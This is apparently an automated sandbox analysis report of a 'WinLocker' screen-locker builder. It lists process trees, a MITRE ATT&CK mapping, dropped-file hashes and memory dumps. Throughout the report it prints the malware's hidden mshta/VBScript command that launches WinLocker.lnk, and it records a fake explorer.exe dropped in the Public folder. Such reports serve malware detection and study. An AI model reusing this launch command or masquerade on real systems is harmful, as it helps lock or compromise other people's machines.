mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:916

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1676

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1292

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:2824

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:776

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3144

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1464

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3444

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:492

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3756

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3172

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3760

C:\Users\Public\explorer.exe
C:\Users\Public\explorer.exe
1⤵
- Executes dropped EXE
PID:4832

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3592

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2088

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4824

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3416

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1656

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2384

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4916

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1400

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3268

C:\Users\Public\explorer.exe
C:\Users\Public\explorer.exe
1⤵
- Executes dropped EXE
- Modifies registry class
PID:2112

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4268

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3884

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2452

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1000

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2736

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4904

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1544

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4476

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:228

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4836

C:\Users\Public\explorer.exe
C:\Users\Public\explorer.exe
1⤵
- Executes dropped EXE
PID:2164

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4272

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3360

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4064

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3108

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2328

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1376

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3960

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1372

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:560

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4700

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4928

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:5052

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:2540

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4384

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Winlocker Builder v0.6.exe.log

Filesize
1KB

MD5
d38d924897227cda127313d6e81c9fc7

SHA1
fdd7008be61565de4455e97e0ff75ebe37c688fc

SHA256
86cd4064df783a308ea2cae00ba3b4891ed26ae261e8ef3454c65ab7d90e8c81

SHA512
d093db1634740ebc07415f720023332aa710027c3d12b0d8e9212374391c9d8bb96a9975bb28e2996dc49f35ec82eac7cdf18b678f738ac163ad34a3b8f16d05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log

Filesize
1KB

MD5
eea63f5d2405bbb1dc4b9638497fcf7c

SHA1
0a915735081be235c767cfa43e63ce2b4124bb25

SHA256
a6c843f44b24f9a028d8a7a1658f775bf95ba916e8aa60a857c2dbac8c44cffc

SHA512
839b6a63f8a2b45d556f2c1e435da87b0e22322751fb38923e76fbbdf78271bb597a55b2fefafe5066800c8108615cc88a38c1847aa4f526e670698515fd45ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c8e142ee24a77ad7f21f6a741d48c8da

SHA1
2f174ae49dd03c3b2acd2f9cb2f4e1913908e749

SHA256
e81cbecfdbc457b5d8aad1fbd1dc29ab05e6425e9921bff30089f074ddfc6961

SHA512
ea1c13f3c559afbdfd63a6ecd2ca354612c3c29c2716156d5afcafe6d3fbd0e7eca7b1f03e68f3a28c78cbea5ec430285fa699facad72fc52a37fca207999799

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5a0739951140fe52e6494fac54da294f

SHA1
b13ce5ec589308d4e1bd1d152caa2e2b39c1652d

SHA256
ca238a51ddba54ae7c343cf07c8e74ca7ba9d664963455fde9f2018f285844bc

SHA512
9539579e4c1f53219133ae3b249f3e91df22c73962601cc7cb6d75b821e91facbc7f269f29a9d66311f24d69454cc78b3d449f7ddf55abb0084648bdcf0a98bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5b705b4839f481b2485f2195c589cad0

SHA1
a55866cd9e6fedf352d0e937101755ea61a50c86

SHA256
f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6

SHA512
f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f8c40f7624e23fa92ae2f41e34cfca77

SHA1
20e742cfe2759ac2adbc16db736a9e143ca7b677

SHA256
c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

SHA512
f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e8a7ab7bae6a69946da69507ee7ae7b0

SHA1
b367c72fa4948493819e1c32c32239aa6e78c252

SHA256
cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272

SHA512
89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f28832ecd9829ee81bb32f98f0747445

SHA1
ac0dc6c286da7b0b7b1b595aaf4f8877e1304125

SHA256
d44590cb55e999c1e0abdd9932e00ddde1bc637ac3eb7d02374ace88479f2f50

SHA512
3b72129f951df7d4b2437ed761ff00ea9dc046a284665a3036b9c86fd20626435f775ec2bb9665435b7d8ec6a211e6c54d1debae75b5ae8778797b3485a163fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050567a067ffea4eb40fe2eefebdc1ee

SHA1
6e1fb2c7a7976e0724c532449e97722787a00fec

SHA256
3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

SHA512
341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl

Filesize
49KB

MD5
8fe4b2ca0b85980b73050ab7e8eb58a8

SHA1
d78af51db795dd51ffe48f96321d7a3fdd853117

SHA256
16160a0f94f668219b4b69aa3c396aef00388c305e66a887f7a891fb460bc914

SHA512
6d73f190d657b9f04887d7d88ef8aa913e61b3eb8de50de4607f035a32fde9f9bb2f76a9918d73039ca294a56d98e2a7de7f233ff5b43079a5d80bbf7b2392f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aypjq3lk.tpi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\WinLocker.lnk

Filesize
104B

MD5
62658c068ffbf0e44a72ac7ad1d0de8c

SHA1
be24daae430936518ccafa73d53e64ca3f29f4b1

SHA256
b87ace89fe7d8861eaa93dde044ba1b74d7fb29b84ec945e5ec681511fe3096a

SHA512
0e56c57ebeaba882ce2b1290f053b2d95367b2809306b31cd7b0fbe7f47c7f656818f8a49311c8bccaa67c8f0b16d6c3d25119289adbfb27b275eb780e8dd036

Download Submit
memory/8-811-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/8-1076-0x000000005ACB0000-0x000000005ACC4000-memory.dmp

Filesize
80KB

Download
memory/560-348-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/764-685-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/792-916-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1052-1411-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1156-18-0x0000000000950000-0x0000000000964000-memory.dmp

Filesize
80KB

Download
memory/1156-33-0x000001BE7E650000-0x000001BE7EB78000-memory.dmp

Filesize
5.2MB

Download
memory/1156-19-0x000000005ACF0000-0x000000005AD04000-memory.dmp

Filesize
80KB

Download
memory/1164-200-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1388-254-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1420-538-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1436-895-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1444-1349-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1544-622-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1692-992-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1764-306-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1824-1055-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1824-706-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/1840-411-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2012-958-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2156-72-0x0000000005100000-0x0000000005112000-memory.dmp

Filesize
72KB

Download
memory/2156-71-0x000000005ACF0000-0x000000005AD04000-memory.dmp

Filesize
80KB

Download
memory/2200-1370-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2216-1307-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2308-517-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2328-432-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2360-1139-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2492-390-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2544-454-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2660-1034-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2660-1391-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2748-1328-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2776-282-0x000000005ACB0000-0x000000005ACC4000-memory.dmp

Filesize
80KB

Download
memory/2776-281-0x00000000007C0000-0x00000000007D4000-memory.dmp

Filesize
80KB

Download
memory/2860-369-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/2936-1202-0x000000005ACB0000-0x000000005ACC4000-memory.dmp

Filesize
80KB

Download
memory/3100-664-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3100-874-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3116-25-0x000001E409210000-0x000001E409232000-memory.dmp

Filesize
136KB

Download
memory/3200-1265-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3204-1244-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3280-327-0x000000005ACB0000-0x000000005ACC4000-memory.dmp

Filesize
80KB

Download
memory/3388-971-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3396-1097-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3560-601-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3688-748-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3704-87-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3784-173-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3836-559-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/3888-1433-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4032-643-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4060-1223-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4092-769-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4108-132-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4224-1286-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4272-727-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4288-937-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4316-1160-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4384-1181-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4496-227-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4628-853-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4672-1013-0x000000005ACB0000-0x000000005ACC4000-memory.dmp

Filesize
80KB

Download
memory/4676-475-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4700-496-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4752-580-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4832-790-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4924-1118-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4956-13-0x00007FF9D2050000-0x00007FF9D2B12000-memory.dmp

Filesize
10.8MB

Download
memory/4956-2-0x00007FF9D2050000-0x00007FF9D2B12000-memory.dmp

Filesize
10.8MB

Download
memory/4956-1-0x00000000007A0000-0x000000000090E000-memory.dmp

Filesize
1.4MB

Download
memory/4956-0-0x00007FF9D2053000-0x00007FF9D2055000-memory.dmp

Filesize
8KB

Download
memory/4980-53-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download
memory/4980-52-0x0000000000870000-0x0000000000884000-memory.dmp

Filesize
80KB

Download
memory/5036-832-0x000000005ACD0000-0x000000005ACE4000-memory.dmp

Filesize
80KB

Download